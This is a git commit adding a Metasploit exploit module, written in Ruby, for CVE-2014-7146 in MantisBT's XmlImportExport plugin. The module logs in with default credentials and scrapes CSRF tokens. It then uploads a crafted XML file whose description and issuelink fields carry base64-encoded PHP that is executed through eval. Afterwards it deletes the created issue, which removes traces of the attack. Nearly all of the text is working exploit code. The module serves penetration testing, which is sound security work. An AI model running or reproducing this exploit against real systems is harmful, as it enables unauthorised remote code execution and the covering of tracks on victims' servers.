Add CVE-2014-7146 PHP Code Execution for MantisBT

itsecurityco · itsecurityco · commit 5d1763703813 · 2014-11-09T08:00:44.000-05:00
diff --git a/modules/exploits/multi/http/mantisbt_php_exec.rb b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -0,0 +1,310 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability',
+      'Description'    => %q{
+        When importing data with the plugin, user input passed through the "description" field (and the "issuelink" attribute) of the uploaded XML file isn't properly sanitized before being used in a call to the preg_replace() function which uses the 'e' modifier.
+        This can be exploited to inject and execute arbitrary PHP code when the Import/Export plugin is installed.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Egidio Romano', # discovery http://karmainsecurity.com
+          'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-7146']
+        ],
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Generic (PHP Payload)', {}]],
+      'DisclosureDate' => 'Nov 8 2014',
+      'DefaultTarget'  => 0))
+
+      register_options(
+      [
+        OptString.new('USERNAME', [ true, 'Username to authenticate as', 'administrator']),
+        OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'root']),
+        OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '']),
+      ], self.class)
+  end
+
+  def check
+    res = exec_php('phpinfo(); die();', true)
+
+    if res && res.body =~ /This program makes use of the Zend/
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+  def exec_php(php_code, is_check = false)
+
+    # remove comments, line breaks and spaces of php_code
+    payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
+
+    # clean b64 payload (we can not use quotes or apostrophes and b64 string must not contain equals)
+    while Rex::Text.encode_base64(payload_clean) =~ /=/
+      payload_clean = "#{ payload_clean } "
+    end
+    payload_b64 = Rex::Text.encode_base64(payload_clean)
+
+    rand_text = Rex::Text.rand_text_alpha_upper(5, 8)
+    rand_num = Rex::Text.rand_text_numeric(1, 9)
+
+    print_status("Checking access to MantisBT...")
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'login_page.php'),
+      'vars_get' => {
+        'return'  => normalize_uri(target_uri.path, 'plugin.php?=XmlImportExport/import'),
+      }
+    })
+
+    unless res && res.code == 200
+      print_error("Error accesing to MantisBT")
+      return false
+    end
+
+    phpsessid = ' PHPSESSID' << res.get_cookies.split('PHPSESSID')[1].split('; ')[0]
+
+    print_status('Logging in...')
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'login.php'),
+      'headers'  => {
+        'Cookie' => phpsessid,
+      },
+      'vars_post' => {
+        'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
+        'username' => datastore['username'],
+        'password' => datastore['password'],
+        'secure_session' => 'on',
+      }
+    })
+
+    unless res && res.code == 302
+      print_error("Login failed")
+      return false
+    end
+
+    mantis_string_cookie = ' MANTIS_STRING_COOKIE' << res.get_cookies.split('MANTIS_STRING_COOKIE')[1].split('; ')[0]
+
+    print_status("Checking XmlImportExport plugin...")
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'plugin.php'),
+      'headers'  => {
+        'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
+      },
+      'vars_get' => {
+        'page' => 'XmlImportExport/import',
+      }
+    })
+
+    unless res && res.code == 200
+      print_error("Error trying to access to XmlImportExport/import page...")
+      return false
+    end
+
+    # Retrieving CSRF token
+    if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/
+      csrf_token = Regexp.last_match[1]
+    else
+      print_error("Error trying to read CSRF token")
+      return false
+    end
+
+    # Retrieving default project id
+    if res.body =~ /name="project_id" value="([0-9]+)"/
+      project_id = Regexp.last_match[1]
+    else
+      print_error("Error trying to read project id")
+      return false
+    end
+
+    # Retrieving default category id
+    if res.body =~ /name="defaultcategory">[.|\r|\r\n]*<option value="([0-9])" selected="selected" >\(select\)<\/option><option value="1">\[All Projects\] (.*)<\/option>/
+      category_id = Regexp.last_match[1]
+      category_name = Regexp.last_match[2]
+    else
+      print_error("Error trying to read default category")
+      return false
+    end
+
+    # Retrieving default max file size
+    if res.body =~ /name="max_file_size" value="([0-9]+)"/
+      max_file_size = Regexp.last_match[1]
+    else
+      print_error("Error trying to read default max file size")
+      return false
+    end
+
+    # Retrieving default step
+    if res.body =~ /name="step" value="([0-9]+)"/
+      step = Regexp.last_match[1]
+    else
+      print_error("Error trying to read default step value")
+      return false
+    end
+
+    if is_check
+      timeout = 20
+    else
+      timeout = 3
+    end
+
+    uid  = rand_text_numeric(29).to_s
+
+    data =  "-----------------------------#{ uid }\r\n"
+    data << "Content-Disposition: form-data; name=\"plugin_xml_import_action_token\"\r\n\r\n"
+    data << "#{ csrf_token }\r\n"
+    data <<  "-----------------------------#{ uid }\r\n"
+    data << "Content-Disposition: form-data; name=\"project_id\"\r\n\r\n"
+    data << "#{ project_id }\r\n"
+    data <<  "-----------------------------#{ uid }\r\n"
+    data <<  "Content-Disposition: form-data; name=\"max_file_size\"\r\n\r\n"
+    data <<  "#{ max_file_size }\r\n"
+    data <<  "-----------------------------#{ uid }\r\n"
+    data <<  "Content-Disposition: form-data; name=\"step\"\r\n\r\n"
+    data <<  "#{ step }\r\n"
+    data <<  "-----------------------------#{ uid }\r\n"
+    data <<  "Content-Disposition: form-data; name=\"file\"; filename=\"#{ rand_text }.xml\r\n"
+    data <<  "Content-Type: text/xml\r\n\r\n"
+    data <<  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"
+    data <<  "<mantis version=\"1.2.17\" urlbase=\"http://localhost/\" issuelink=\"${eval(base64_decode(#{ payload_b64 }))}}\" notelink=\"~\" format=\"1\">\r\n"
+    data <<  "    <issue>\r\n"
+    data <<  "        <id>#{ rand_num }</id>\r\n"
+    data <<  "        <project id=\"#{ project_id }\">#{ rand_text }</project>\r\n"
+    data <<  "        <reporter id=\"#{ rand_num }\">#{ rand_text }</reporter>\r\n"
+    data <<  "        <priority id=\"30\">normal</priority>\r\n"
+    data <<  "        <severity id=\"50\">minor</severity>\r\n"
+    data <<  "        <reproducibility id=\"70\">have not tried</reproducibility>\r\n"
+    data <<  "        <status id=\"#{ rand_num }\">new</status>\r\n"
+    data <<  "        <resolution id=\"#{ rand_num }\">open</resolution>\r\n"
+    data <<  "        <projection id=\"#{ rand_num }\">none</projection>\r\n"
+    data <<  "        <category id=\"#{ category_id }\">#{ category_name }</category>\r\n"
+    data <<  "        <date_submitted>1415492267</date_submitted>\r\n"
+    data <<  "        <last_updated>1415507582</last_updated>\r\n"
+    data <<  "        <eta id=\"#{ rand_num }\">none</eta>\r\n"
+    data <<  "        <view_state id=\"#{ rand_num }\">public</view_state>\r\n"
+    data <<  "        <summary>#{ rand_text }</summary>\r\n"
+    data <<  "        <due_date>1</due_date>\r\n"
+    data <<  "        <description>{${eval(base64_decode(#{ payload_b64 }))}}1</description>\r\n"
+    data <<  "    </issue>\r\n"
+    data <<  "</mantis>\r\n\r\n"
+    data <<  "-----------------------------#{ uid }\r\n"
+    data <<  "Content-Disposition: form-data; name=\"strategy\"\r\n\r\n"
+    data <<  "renumber\r\n"
+    data <<  "-----------------------------#{ uid }\r\n"
+    data <<  "Content-Disposition: form-data; name=\"fallback\"\r\n\r\n"
+    data <<  "link\r\n"
+    data <<  "-----------------------------#{ uid }\r\n"
+    data <<  "Content-Disposition: form-data; name=\"keepcategory\"\r\n\r\n"
+    data <<  "on\r\n"
+    data <<  "-----------------------------#{ uid }\r\n"
+    data <<  "Content-Disposition: form-data; name=\"defaultcategory\"\r\n\r\n"
+    data <<  "#{ category_id }\r\n"
+    data <<  "-----------------------------#{ uid }--\r\n\r\n"
+
+    print_status("Sending payload...")
+    res = send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import_action'),
+      'headers' => {
+        'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
+      },
+      'ctype'   => "multipart/form-data; boundary=---------------------------#{ uid }",
+      'data'    => data,
+    }, timeout)
+
+    res_payload = res
+
+    print_status("Deleting the issue (#{ rand_text })...")
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'my_view_page.php'),
+      'headers'  => {
+        'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
+      },
+    })
+
+    unless res && res.code == 200
+      print_error("Error trying to access to My View page")
+      return false
+    end
+
+    if res.body =~ /title="\[@[0-9]+@\] #{ rand_text }">0+([0-9]+)<\/a>/
+      issue_id = Regexp.last_match[1]
+     else
+      print_error("Error trying to retrieve the issue id")
+      return false
+    end
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'bug_actiongroup_page.php'),
+      'headers'  => {
+        'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
+      },
+      'vars_get' => {
+        'bug_arr[]' => issue_id,
+        'action' => 'DELETE',
+      },
+    })
+
+    if res && res.body =~ /name="bug_actiongroup_DELETE_token" value="(.*)"\/>/
+      csrf_token = Regexp.last_match[1]
+    else
+      print_error("Error trying to retrieve CSRF token")
+      return false
+    end
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'bug_actiongroup.php'),
+      'headers'  => {
+        'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
+      },
+      'vars_post' => {
+        'bug_actiongroup_DELETE_token' => csrf_token,
+        'bug_arr[]' => issue_id,
+        'action' => 'DELETE',
+      },
+    })
+
+    if res && res.code == 302 || res.body !~ /Issue #{ issue_id } not found/
+      print_good("Issue number (#{ issue_id }) removed")
+    else
+      print_error("Removing issue number (#{ issue_id }) has failed")
+      return false
+    end
+
+    # if check return the response
+    if is_check
+      return res_payload
+    else
+      return true
+    end
+  end
+
+  def exploit
+    unless exec_php(payload.encoded)
+      fail_with(Failure::Unknown, "#{peer} - Exploit failed, aborting.")
+    end
+  end
+end
